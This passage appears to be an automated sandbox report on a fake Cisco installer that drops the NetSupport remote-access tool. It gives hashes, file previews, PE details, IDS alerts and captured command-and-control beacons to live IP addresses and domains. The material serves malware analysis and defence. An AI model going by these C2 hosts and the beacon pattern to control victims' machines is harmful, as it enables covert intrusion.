                                                                                                                                      SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                      SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33144
                                                                                                                                      Entropy (8bit):6.737780491933496
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):72584
                                                                                                                                      Entropy (8bit):6.671736046146569
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                      MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                      SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                      SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                      SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\init_temp.zip

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2275903
                                                                                                                                      Entropy (8bit):7.997003172118591
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                      MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                      SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                      SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                      SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv*....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g..*_..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIM*M..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8|.a@ (.D..E1...$,B.[.@.\A.`@..D..*1F.K..P...m.u_*.hk....Z..j...TQ.|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.978020540658888
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      File name:CiscoSetup.exe
                                                                                                                                      File size:16'883'280 bytes
                                                                                                                                      MD5:446a85d94adb8e2e9157170b82592d6a
                                                                                                                                      SHA1:1ea726940904e568dbdc4a6ef50b61cae6bb55ea
                                                                                                                                      SHA256:65110470f6c6c96877e96a640adcf6178186b675e6d1bc24c19f977a12220294
                                                                                                                                      SHA512:96684b30d90f32a57b8b264da520c31b063991830e472798d46147e3811fcd27e5c400f7fd3832b5ed0975e43b2efd6cbebd152b58442dd5e630416de6a0e0fe
                                                                                                                                      SSDEEP:393216:qxxFZAWTc+MZ3mOvSY6oDXtVVFOzWyY4bkZsFVf:wAL+WmOvS9qDSzJbki
                                                                                                                                      TLSH:8D073327B28BA43DE44A0B3B0572E57844FB7E51A473BD1697E4B9ADCF370611C2E206
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:adaeb397f36b6331

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x4a83bc
                                                                                                                                      Entrypoint Section:.itext
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:6
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:6
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:6
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc

                                                                                                                                      Authenticode Signature

                                                                                                                                      Signature Valid:true
                                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                      Error Number:0
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 26/09/2024 08:47:26 27/09/2025 08:47:26
                                                                                                                                      Subject Chain
                                                                                                                                      • E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:92142F58BB541C3BD5CD828C76AE0FC4
                                                                                                                                      Thumbprint SHA-1:56FC98490B4845072947536B9E0AC121A37744E6
                                                                                                                                      Thumbprint SHA-256:CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
                                                                                                                                      Serial:7F07AA1BB8A3B0183893B1AA

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFA4h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      xor eax, eax
                                                                                                                                      mov dword ptr [ebp-3Ch], eax
                                                                                                                                      mov dword ptr [ebp-40h], eax
                                                                                                                                      mov dword ptr [ebp-5Ch], eax
                                                                                                                                      mov dword ptr [ebp-30h], eax
                                                                                                                                      mov dword ptr [ebp-38h], eax
                                                                                                                                      mov dword ptr [ebp-34h], eax
                                                                                                                                      mov dword ptr [ebp-2Ch], eax
                                                                                                                                      mov dword ptr [ebp-28h], eax
                                                                                                                                      mov dword ptr [ebp-14h], eax
                                                                                                                                      mov eax, 004A2EBCh
                                                                                                                                      call 00007F1518761EE5h
                                                                                                                                      xor eax, eax
                                                                                                                                      push ebp
                                                                                                                                      push 004A8AC1h
                                                                                                                                      push dword ptr fs:[eax]
                                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 004A8A7Bh
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      mov eax, dword ptr [004B0634h]
                                                                                                                                      call 00007F15187F386Bh
                                                                                                                                      call 00007F15187F33BEh
                                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                                      xor eax, eax
                                                                                                                                      call 00007F15187EE098h
                                                                                                                                      mov edx, dword ptr [ebp-14h]
                                                                                                                                      mov eax, 004B41F4h
                                                                                                                                      call 00007F151875BF93h
                                                                                                                                      push 00000002h
                                                                                                                                      push 00000000h
                                                                                                                                      push 00000001h
                                                                                                                                      mov ecx, dword ptr [004B41F4h]
                                                                                                                                      mov dl, 01h
                                                                                                                                      mov eax, dword ptr [0049CD14h]
                                                                                                                                      call 00007F15187EF3C3h
                                                                                                                                      mov dword ptr [004B41F8h], eax
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 004A8A27h
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      call 00007F15187F38F3h
                                                                                                                                      mov dword ptr [004B4200h], eax
                                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                                                      jne 00007F15187FA5DAh
                                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                                      mov edx, 00000028h
                                                                                                                                      call 00007F15187EFCB8h
                                                                                                                                      mov edx, dword ptr [004B4200h]

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x44d7c.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x10175100x2940
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0xcb0000x44d7c0x44e0060d61e10c85ee163d7ebf4b3a98fdf4fFalse0.19718409709618875data5.16526620038522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0xcb4380x41828Device independent bitmap graphic, 254 x 512 x 32, image size 260096EnglishUnited States0.19084478697713247
                                                                                                                                      RT_STRING0x10cc600x3f8data0.3198818897637795
                                                                                                                                      RT_STRING0x10d0580x2dcdata0.36475409836065575
                                                                                                                                      RT_STRING0x10d3340x430data0.40578358208955223
                                                                                                                                      RT_STRING0x10d7640x44cdata0.38636363636363635
                                                                                                                                      RT_STRING0x10dbb00x2d4data0.39226519337016574
                                                                                                                                      RT_STRING0x10de840xb8data0.6467391304347826
                                                                                                                                      RT_STRING0x10df3c0x9cdata0.6410256410256411
                                                                                                                                      RT_STRING0x10dfd80x374data0.4230769230769231
                                                                                                                                      RT_STRING0x10e34c0x398data0.3358695652173913
                                                                                                                                      RT_STRING0x10e6e40x368data0.3795871559633027
                                                                                                                                      RT_STRING0x10ea4c0x2a4data0.4275147928994083
                                                                                                                                      RT_RCDATA0x10ecf00x10data1.5
                                                                                                                                      RT_RCDATA0x10ed000x310data0.6173469387755102
                                                                                                                                      RT_RCDATA0x10f0100x2cdata1.1818181818181819
                                                                                                                                      RT_GROUP_ICON0x10f03c0x14dataEnglishUnited States1.25
                                                                                                                                      RT_VERSION0x10f0500x584dataEnglishUnited States0.2747875354107649
                                                                                                                                      RT_MANIFEST0x10f5d40x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                                                                                                                                      Exports

                                                                                                                                      NameOrdinalAddress
                                                                                                                                      __dbk_fcall_wrapper20x40fc10
                                                                                                                                      dbkFCallWrapperAddr10x4b063c

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States

                                                                                                                                      Network Behavior

                                                                                                                                      Suricata IDS Alerts

                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-01T12:10:58.103251+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.660703151.236.16.15443TCP
                                                                                                                                      2024-11-01T12:10:58.103251+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.660707199.188.200.195443TCP
                                                                                                                                      2024-11-01T12:11:19.931659+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649748TCP
                                                                                                                                      2024-11-01T12:12:00.477050+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.660861TCP

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 1, 2024 12:11:31.279987097 CET60703443192.168.2.6151.236.16.15
                                                                                                                                      Nov 1, 2024 12:11:31.280038118 CET44360703151.236.16.15192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.280733109 CET60703443192.168.2.6151.236.16.15
                                                                                                                                      Nov 1, 2024 12:11:31.348548889 CET60703443192.168.2.6151.236.16.15
                                                                                                                                      Nov 1, 2024 12:11:31.348586082 CET44360703151.236.16.15192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.348650932 CET44360703151.236.16.15192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.585293055 CET60707443192.168.2.6199.188.200.195
                                                                                                                                      Nov 1, 2024 12:11:31.585328102 CET44360707199.188.200.195192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.585469007 CET60707443192.168.2.6199.188.200.195
                                                                                                                                      Nov 1, 2024 12:11:31.679563046 CET60707443192.168.2.6199.188.200.195
                                                                                                                                      Nov 1, 2024 12:11:31.679601908 CET44360707199.188.200.195192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.679656029 CET44360707199.188.200.195192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.780821085 CET6071080192.168.2.6104.26.1.231
                                                                                                                                      Nov 1, 2024 12:11:31.785718918 CET8060710104.26.1.231192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.785784960 CET6071080192.168.2.6104.26.1.231
                                                                                                                                      Nov 1, 2024 12:11:31.786320925 CET6071080192.168.2.6104.26.1.231
                                                                                                                                      Nov 1, 2024 12:11:31.791259050 CET8060710104.26.1.231192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:32.761198997 CET8060710104.26.1.231192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:32.761261940 CET6071080192.168.2.6104.26.1.231
                                                                                                                                      Nov 1, 2024 12:13:21.759007931 CET6071080192.168.2.6104.26.1.231
                                                                                                                                      Nov 1, 2024 12:13:21.764305115 CET8060710104.26.1.231192.168.2.6
                                                                                                                                      Nov 1, 2024 12:13:21.764372110 CET6071080192.168.2.6104.26.1.231

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 1, 2024 12:11:22.318131924 CET53544261.1.1.1192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.021378994 CET6110653192.168.2.61.1.1.1
                                                                                                                                      Nov 1, 2024 12:11:31.274995089 CET53611061.1.1.1192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.349478960 CET6289953192.168.2.61.1.1.1
                                                                                                                                      Nov 1, 2024 12:11:31.515782118 CET53628991.1.1.1192.168.2.6
                                                                                                                                      Nov 1, 2024 12:11:31.765129089 CET6440653192.168.2.61.1.1.1
                                                                                                                                      Nov 1, 2024 12:11:31.777743101 CET53644061.1.1.1192.168.2.6

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 1, 2024 12:11:31.021378994 CET192.168.2.61.1.1.10x4762Standard query (0)payiki.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.349478960 CET192.168.2.61.1.1.10x80daStandard query (0)anyhowdo.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.765129089 CET192.168.2.61.1.1.10xe084Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 1, 2024 12:11:31.274995089 CET1.1.1.1192.168.2.60x4762No error (0)payiki.com151.236.16.15A (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.515782118 CET1.1.1.1192.168.2.60x80daNo error (0)anyhowdo.com199.188.200.195A (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.777743101 CET1.1.1.1192.168.2.60xe084No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.777743101 CET1.1.1.1192.168.2.60xe084No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                                      Nov 1, 2024 12:11:31.777743101 CET1.1.1.1192.168.2.60xe084No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                      • 199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                      • geo.netsupportsoftware.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.660703151.236.16.154434176C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 1, 2024 12:11:31.348548889 CET218OUTPOST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.660707199.188.200.1954434176C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 1, 2024 12:11:31.679563046 CET222OUTPOST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.660710104.26.1.231804176C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 1, 2024 12:11:31.786320925 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Nov 1, 2024 12:11:32.761198997 CET959INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 01 Nov 2024 11:11:32 GMT
                                                                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      CF-Ray: 8dbb71d30a3a4768-DFW
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: private
                                                                                                                                      Set-Cookie: ASPSESSIONIDACBSDDAB=ODPLDFECBLLOAAMMDDNGAAEI; path=/
                                                                                                                                      cf-apo-via: origin,host
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Powered-By: ASP.NET
